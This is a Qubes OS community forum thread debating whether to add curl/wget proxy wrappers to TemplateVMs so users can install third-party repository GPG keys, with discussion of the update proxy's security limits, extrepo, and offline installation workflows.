Curl-proxy / wget-proxy scripts in Templates so users can add GPG distro keys linked to added external repositories

How is this a safe guard though?

The net effect is still the same proxy or not, we’re giving the user a way of downloading arbitrary scripts from the internet in the templates.

Now, if you want to justify that by saying it’s a convenience vs security thing, that’s one thing, but I don’t buy that doing it through a proxy is any safer than just exposing the network directly.

The three second pause also seems really in-elegant to me too. We’re giving no information that the user didn’t have before executing the command in the first place. What are we even saying here? “This command might be safe or it it might not be?” I thought the whole point of this endeavor was to optimize for the usability of a non-technical user, how are they going to know whether to wait three seconds or not?

Currently the templates have a really clear threat model in mind. Bad software in them can threaten the compartmentalization of Qubes. Therefore, we disallow network access pushing users to use the trusted repositories, which enforce signature checking etc.

The aim of this change to me, is to improve usability for our hypothetical non tech savvy journalist (to quote your other post) without breaking the above threat model. With that in mind, intercepting wget and curl seems too low level.

I think it would be much cleaner to just add the keys of the common software this user wants to install. I’m not sure I buy the “no persona” software argument, as it seems that this change has a very specific person in mind as it currently stands.

The best thing you could do for this type of user, is make it so they can install signal/wire/session et al without manually downloading and verifying keys through the standard package manager mechanism

If people are really adverse to this, then I think a cleaner approach would be to develop a mechanism to add GPG/repos to templates in a safe way. This is more intuitive to me because it’s more explicit than blindly intercepting network commands and adding arbitrary pauses.

See this issue for some insight. Basically:

  • there is an Arch repo
  • the upstream team is unlikely to attempt to feed all distributions
  • signal-desktop is 100% open source … so any volunteer could start feeding e.g. Debian

Personally I can see one argument for the signal team wanting everyone to use their repo: speed of rolling out updates in case of compromise. By them fully controlling every step, they control how long it takes until updates are available. This might be important one day.

The ‘General Discussion’ category does not have ‘solutions’. Only ‘User Support’ topics do. That’s because a discussion can’t have a ‘solution’, just points of view. In this particular case, if and what actions will be taken is entirely decided by the qubes core team and not through any discussion had in this forum. Imagine the mess Qubes OS would be otherwise!

Fully agree.

1 Like

And that is, having an organisation deploying those repos+gpg keys, or, having Qubes take side into deploying some repositories/not others.

For the other points, the only solution to your comments would be to remove the proxy in Templates (they are used and wrapped by dnf/apt today), which could be interpreted by security by obscurity. A script downloaded per other qube, pushed into templates calling wget/curl with proxy arguments would work as is, today.

We are mixing a lot of things here.

It’s quite the opposite actually. Before the author of the malicious script had to know that the target uses Qubes OS and therefore add code that would use proxy 8082. Or the actual user had to understand what’s going on and provide the proxy address.

Now any malicious script will simply work with a 3 second pause! What progress!

I for one take away from this discussion: I will secure my UpdateProxy and share instructions how to do so… so it becomes impossible to download ANYTHING that I have not whitelisted.

3 Likes

Ok. Point made @Sven :slight_smile:

I would continue to advocate that the wrapper was pausing WHILE TELLING THE USER what was going to happen next, but now get that it would not serve the expected outcome… While reminding everyone that scripts calling the proxy directly today would work, without that non-existing safeguard. And that people not blocking that feature (which is used by dnf/apt to update Templates) as of today could have scripts download stuff if no wrappers are made available to pause, failsafe those downloads. So what to do with that?

Having 3 seconds pausing will open more widely, I get the point.
Following others considerations, it would be better to have the wrappers failsafe, explaining why, or have MOTD explaining security properties/differences implemented in the TemplateVM.

Solutions are:

  • Deploy GPG keys + Repos from packages.
  • MOTD/wrappers educate/telling users what is going on/what to do.
  • Have users pass explicitely wget/curl/other arguments to be able to use those commands.
  • Have cloned TemplateVMs have internet access momentarily.

@Sven

Well, now more then even, I would love to have tinyproxy logs to at least match hostnames/timestamps for dnf/apt update attempts. Otherwise, this proxy is more security by obscurity (not knowing where the proxy was, which is not randomized per install but static per installation) and once known, can be used by scripts.

Again, the idea was to permit installation per upstream software installation guides. Did not want to address malware download scripts, evolved in such way to pause user before doing so, where now people want more protection from the proxy once knowing that it is there to be used if known per such script.

Insurgo:
And that is, having an organisation deploying those repos+gpg keys, or, having Qubes take side into deploying some repositories/not others.

This is in effect what we do with Whonix. I think it’s a question of pragmatism, if an app is open source, used by millions and has a high relevance to a large part of our user base then I don’t think it’s unreasonable to include its repo.
Even if I take this argument, I still think the correct solution is to expose a safe way to explicitly add repos.

Insurgo:
For the other points, the only solution to your comments would be to remove the proxy in Templates (they are used and wrapped by dnf/apt today), which could be interpreted by security by obscurity. A script downloaded per other qube, pushed into templates calling wget/curl with proxy arguments would work as is, today.

I’m actually pretty shocked there isn’t a more granular whitelist here if I’m honest. All the same, it’s very different to have some proxy at the lower level for the purposes of making the package manager work as opposed to making this an idiom that is exposed to the user.

Sven:
It’s quite the opposite actually. Before the author of the malicious script had to know that the target uses Qubes OS and therefore add code that would use proxy 8082. Or the actual user had to understand what’s going on and provide the proxy address.
Now any malicious script will simply work with a 3 second pause! What progress!
I for one take away from this discussion: I will secure my UpdateProxy and share instructions how to do so… so it becomes impossible to download ANYTHING that I have not whitelisted.

Completely agree.

1 Like

I get that and also where you are coming from. And I am not opposed to making Qubes OS easier to use, quite the opposite. However, IMHO this should NEVER come at the cost of lowering the default level of security provided.

My point of view is that I always found it icky that the only thing between a malicious install script in a template and the internet was the knowledge that there is a proxy at port 8082. Then @unman’s post confirmed to me that once Qubes OS was more secure and that barrier was lowered in the name of convenience. I am in no position to judge or re-evaluate past decisions made by people much smarter than me. However, for me this thread has made it impossible to ignore this itch.

Luckily there is nothing stopping me from either reintroducing a whitelist to apt-cacher-ng (I don’t use tinyproxy) or simply having a dedicated proxy VM for the UpdateProxy and configure it’s firewall. Or maybe once again @adw post a key insight that makes me re-evaluate this. :wink:

But this is another topic than your thread. I think with the MOTD we found a good compromise and I hope it will get adopted.

Thank you also for all your hard work on heads. It is a corner stone of my setup. I’ll probably be rocking this T430 with Ivy Bridge for the rest of my days unless some kind of miracle happens (open architecture).

2 Likes

@marmarek @unman @patrick.whonix (you are not here?) @fepitre @Demi :
Then, I am questionning, really, current Qubes Template approach with proxy, and would love to see what it was before, what changed and where it is now.

Following the reaction of a lot of current thread participants, it seems that the proxy logic permitting dnf/apt was pure magic, where once exposed, caused a strong reaction from them. Now they know that a wide internet access from TemplateVM is available from
http://127.0.0.1:8082 blew their mind, now seeing that this principle was, if we abuse language, security by obscurity.

Some are looking to close it down more (@sven) while others are disappointed from the fact that some scripts might just use be using it now. My attempt being to facilite this usage exposed its existence, which @unman pointed to some past disagreement in changes in the past I cannot directly point back to. The fact persists. That proxy is currently effective, people are against using it directly for better UX because it would make it more easy to use by following official software installation guides, because some random script could be using it, targeting a proxy that is available in all Q4.0/Q4.1 TemplateVMs to permit dnf/apt updates from default, currently Qubes trusted, repositories.

This dichotomy is making me uncomfortable, personally. The information is available. If we prohibit users from using curl/wget because scripts would too easily use such binaries, its just a matter of time and or intense research to find some scripts which are using http://127.0.0.1:8082 for scripts tageting Qubes users into bypassing TemplateVM security measures. Yet, we do not want to facilitate UX by having wrappers to pause external downloads, while being aware that such scripts might exist and that some Qubes users might have ran into it to compromise their Templates already.

We now fallback into desiring to implement MOTD to educate users of TemplateVM limitations/security properties limiting them to be able to use such applications directly, while I now agree with @Sven (multiple stances) and @laurel.straddle :

That such proxy exposure, if not facilitated, still exists, and as of now is more like a security by obscurity measure then anything else.

Please point to the PR/Issues that made the changes happen upstream. I would like to see what were the reasonings of hiding its usage more then securing it. Or understand why proxy was decided over fw rules. Understand before/after such discussions and technical/UX justifications/considerations that made the change happen.

@laurel.straddle To me, that use case is the perfect good example for a qube (where the built application can be launched from build path) or a standalone qube, where user is experimenting, while the TemplateVM use case is the user wanting to install trusted upstream software installation guide, where he expects those trusted installation instructions to just work (because wget/curl are used everywhere in those instructions) while those software are not part of a lot of ecosystem’s repositories.

If a user wants to install GUIX on top of Debian, I expect that user to be technical enough to be able to clone a templatevm, open internet access to it, do what he wants.

But to me, once again, limiting UX with some obscure undocumented protection (in situ) the user not able to comprehend in situ problems (hence wrappers blocking/delaying being a good way to go forward if we keep proxy) goes against all UX principles (@ninavizz/@marmarek please debate of the issue and come back with a settlement!!!).

We cannot have a one size fits all. But the wrapper principles exposed in this PoC, as far as the current discussion goes, could have simply extended the 3 seconds warning to 30 seconds:

With a Qubes configurable delay from Qubes Template GUI, or qvm-prefs, to toggle “advanced_user” or “proxy_delay” to deal with the situation and documented properly. But we need to take a stance here. Security by obscurity is a big no to me, and I guess most of Qubes user base. @unman: please help me here.

I understand all points of views here. But as of now, we currently have a proxy which most thought was offering more protection that it offers. The fact is that it can be called directly and totally and easily bypassed by scripts, which is the reason why this PoC is rejected. At the same time, the current implementation is the reason why this PoC came to life, because it goes against UX principles. But the PoC is rejected because it exposes the current implementation limits? Well. The current implementation is then wrong. Sorry, but this is consequently a fact. Otherwise, the current implementation would limit the scope of the proxy. Don’t get me wrong, I understand that the proxy permits dnf/apt access. But it being fixed to 127.0.0.1 8082, and that now being known making some want to change it, exposes its limits. And past, maybe better, implementation seem to have done a too far jump to an extreme, and now is a time to think of something better. Otherwise, a wrapper around its implementation should have fixed UX problems. That is my opinion. We can document it, but scripts just being able to download stuff will still be a possibility, which is why people reject the PoC.

Reactions are contradictory. And someone from Qubes Team need to present alternatives that would limit such proxy usage, explain the changes that happened before pointing to past discussions/issues/PR and UX addressed, one way or the other.

I cannot emphasise more then this: GUI will have to deal with the same problems of being able to at least import GPG public keys, and add additional repository URLs. Packaging all GPG keys and repositories is simply not possible. And partly addressing this issue will just make it pop later on. IT was asked again and again and again. Where the current Template Proxy existing on 127.0.0.1 8082 is now a concern, the justification for not accepting current PoC being that random script would have access to the internet.

Well. Scripts found online to address current implementation limitations are probably just calling scripts, using the proxy directly, as we speak.

This was all news to me. (I had been vaguely aware of these historical events as they happened but didn’t understand the specifics or implications until you clearly explained them.) You might consider opening an issue to (re-?)improve the security of the default configuration (in the spirit of secure defaults), since the vast majority of Qubes users will probably never be aware of your instructions and even fewer will implement them.

On the other hand, I’d understand if one were reticent to open an issue that relitigates a matter about which @marmarek has already decided. I don’t know what the deciding argument was, but if I had to guess, just based on general Qubes principles, it might’ve been that installation scripts that run in templates are already trusted (or, perhaps more precisely, that each template is already assumed to be only as trusted as the installation scripts that run in it). So, perhaps a thread here or on qubes-devel might be more appropriate (either a new one or a revival of the old one, if anyone can find it).

His username is @adrelanos.

3 Likes

A post was split to a new topic: Why does the UpdateProxy not have a whitelist?

A post was merged into an existing topic: Why does the UpdateProxy not have a whitelist?

@adw For some reason, I missed that point before. Of course, deploying repository information and GPG key doesn’t make sense without installing the desired software in template. The user is following upstream instructions to add repo+gpg key+installing software

Of course, adding a repository (no problem, no network access required) will work but package won’t install unless GPG key is downloaded. From upstream documentations, one last time, that either requires sudo to call wget/curl and put the file directly where expected, or call wget/curl without root privileges and then have root privileges to put it in place (See Signal/Session examples in OP). In either case, and all cases I have personally observed, either curl or wget are used in those installation guides. And in most scripts I have seen, either curl/wget is used to get content online.

This is why, even if time passed and you did modifications on core documentation for software installation (good!), I still think wrappers around wget/curl would address the situation here until we come up with a better approach.

Those wrappers detecting if we are in a template without internet access (default) should offer a non-blocking warning of what is going to happen next: what is wget/curl, what the URL going to be downloaded is, and give a chance to the user to cancel the operation (Pause 3 seconds). I remind again that if a script is doing 3 downloads, the wrappers will be called 3 times, pause 3 times and warn the user 3 times. We could even go farther here, and also point the user to the possibility of calling qvm-volume revert tamplate_name:root if catched too late. Maybe this is a precedent to call for education, while not modifying OS (wrapping is not modifying, but intercepting).

Otherwise, this would be the approach proposed by @Demi : having them deployed (software repositories are there, keys are deployed, which means repositories information is fetched at each template updates, the software being installed or not). The question on that approach would be to know if the Qubes packages containing those additional repositories and GPG keys, would be deployed by default or not, and if they would be part of default Templates by Qubes OS team. Note here: your same reasoning here applies @adw: It would not make any sense to deploy GPG keys without deploying repositories definitions. But as opposed to your point here: it would make sense to deploy GPG keys and repository definitions without installing the software in question.
@adw @deeplow @Demi : in that case, if Qubes decides to go in that direction to resolve the problem, package repositories+GPG keys should probably be individual packages, or persona/use case related, I’m not sure of the best avenue to go from here. Maybe communication related open source related repositories (Signal,Element,Session,etc). But in my mind, the wrapper again wins for other reasons. One being to not poke repositories for software not being installed to reduce network consumption, where I think the wrapper approach again wins without the user opening network access to a template. On that note, I keep receiving questions on a daily basis on how to deploy those GPG keys, even though upstream instructions have been updated. The obvious reason to that is, and I agree:

So again, I would advocate for:

Which would be non-blocking while educating, on the spot for all use cases covered here, script or manual installation. 3 seconds is not much to wait if a user is doing this for the first time. Users that are installing untrusted repositories and software would probably follow updated core Qubes software installation guide, assigning network.

The wrappers could just warn the user he is downloading stuff, not pause download. And the same wrappers called in Qubes… As in latest PoC.

Reminder:

I am still convinced this wrapper approach would be better then what we have now.
The other movement being to strengthen the proxy as it was before, so that trusted repositories are used normally per TemplateVMs and where installing anything untrusted would require to assign network to Template per core updated docs. But the current implementation is to me still questionable, permitting to call wget/curl with proxy to do anything. (The wrapper would still catch that, by the way, in the current PoC)

1 Like

Because those external documentation guides are less than optimal for security.

@marmarek unfortunately, your export solution here, without additional hack, won’t successfully permit installation of Element per upstream instructions, since their wget call is made with sudo. So simply exposing the proxy for current user won’t simply work.

export https_proxy=http://127.0.0.1:8082
sudo wget -O /usr/share/keyrings/element-io-archive-keyring.gpg https://packages.element.io/debian/element-io-archive-keyring.gpg

Results in having name resolution failing from wget (since sudo doesn’t have access to proxy), without giving the user any insight on what do do next.

1 Like

Please do not re-invent extrepo before checking if extrepo fulfills this use case.

extrepo

External repository manager

External repositories are additional software package repositories that are not maintained by Debian. Before extrepo, maintainers of such repositories would suggest that you download and execute an (unsigned) shell script as root, or that you download and install their (unsigned) package, which is not ideal for security.

The extrepo package tries to remedy this, by providing a curated list of external repositories that can be enabled by a simple command, allowing unsigned scripts to be replaced by a simple “extrepo enable example.com_repo”.

Note, however, that while the repositories are curated, and that any repositories with malicious content will be removed and/or disabled when detected, no warranty is made by the Debian project as to the security or quality of the software in these third-party repositories.

They have a huge collection of repositories and signing keys already:

That would require:

sudo -E

-E stands for --preserve-envrionment. sudo clears environment variables. Yeah, Linux is really complex, complicated.

But indeed. Users usually won’t know that. And upstream documentation will just refer to sudo without -E.

Do you mean these repositories enabled by default? If,

  • yes: That’s insecure because every repository manually added has full control over all files inside the template.
  • no: Then users following upstream instructions would still be confused, be shown an error message as soon as they use wget/curl.

Or do you mean something like extrepo?

That seems a ton of work. extrepo already added 102 custom repositories.

Also by that, Qubes would somewhat go into a business similar to the certificate authority business having to decide which repo to add and which ones to refuse.

2 Likes

@Demi @adrelanos I like that approach, would be amazing if that worked outside the box.

Unfortunately @adrelanos, no network by default. Would have been nice if extrepo would permit deployment without network but it doesn’t seem to be the case :

user@debian-11:~$ extrepo enable signal
Need to be root to modify external repository configuration!
	...propagated at /usr/bin/extrepo line 123.
user@debian-11:~$ sudo extrepo enable signal
Could not download index YAML file:
Invalid argument at /usr/bin/extrepo line 123.
user@debian-11:~$ sudo extrepo update signal
Could not download index YAML file:
Invalid argument at /usr/bin/extrepo line 123.

Digging down, the repos are provided by extrepo-data, which doesn’t have an installable bullseye candidate (debian-11).

I see under whonix referred link that it is provided under whonix-16 workstation, where extrepo-offline-data is installable in template. Even installed, if cut off of network, enabling signal repo still requires internet gateway to enable. Or I missed something. Newer versions upstream add a flag for --offlinedata, but this is not yet available, and not installable under debian-11 template nor useable to install software today under whonix-16 template without affecting gateway to template, as in precedent discussions.

The question here, again, is what to do next to resolve additional software installation need for end users: @marmarek.

1 Like

I’m a bit confused by all of this, but did run into the situation where I couldn’t get hold of the flatpack without all those keyring gyrations.

So, I did this (I’d like it critiqued by the “hard core” security minded people here). It assumes the flatpak itself is trusted even if the delivery system is not.

Clone whatever qube you use for internet work (or fire up a terminal in a disposable qube). Run all of those commands in that qube. But as the last command do an apt download rather than an apt install.

Copy the resulting file to another qube (I’ve set up one with no network connections to act as a “repository” for such things). If the qube doing the downloading was a clone rather than a dispoable, delete that qube.

When creating the template, copy the file from the repository qube to the template, and run the install in the template.

The template never touches the internet. This process can be mostly automated though you might want one script for the download and another for the install. However…the copy from the downloading qube to the repository and from the repository to the installing template will both require user confirmation (or is there some way, when dom0 is issuing the command to copy from qube A to qube B, to bypass this?).

If using scripts, I find it best to echo the name of the file AND the name of the destination qube before doing the move, so you are reminded which system to select. I also do this copy either at the beginning (if possible–e.g., repository to template copy) or end of the script (if possible–e.g., downloader to repository) so that you can start the script and walk away from it shortly thereafter. If the popup is at the end of the script, and you walked away before it ran, that’s fine, because the script will end seconds after you confirm it. I just want to avoid a long interval of work being delayed because you got bored watching it and walked away, then you coming back only to find you have to confirm it and wait fifteen more minutes; time which could have elapsed while you were taking your break. [All of this, of course, is moot if there is some way for a dom0 command for qube A to copy to qube B can bypass the user confirmation.]

Option: Add a wrapper by default setting the http_proxy environment variable so even if the user types extrepo in TemplateVM it will already have the requierd http_proxy environment variable set?

Yeah. I suggest to lower the goal and accepting that this might only get implemented in Debian 12 (bookworm).

Otherwise looking on how this discussion went, my experience tell me nothing will be implemented for Debian 11 anyhow. So extrepo seems the most realistic route to me even if only for Debian stable + 1 or even Debian stable + 2.

Any missing functionality in Debian 12 version of extrepo I suggest raising at upstream which in my experience a while ago was fast, friendly and supportive. Also extrepo while very much appreciated and worthwhile that it has been created, isn’t rocket science. The Qubes team could submit patches upstream. Perhaps a “plug-in” architecture or some option to set the environment variable if running inside Qubes might be acceptable to extrepo to avoid the wrapper for networking.

1 Like

I check that for gpg proxy flag not working properly when you try to download key from keyserver, and found that it is some known bug. But is there a working solution for ruby gem bundler? I try with exporting https_proxy but without success.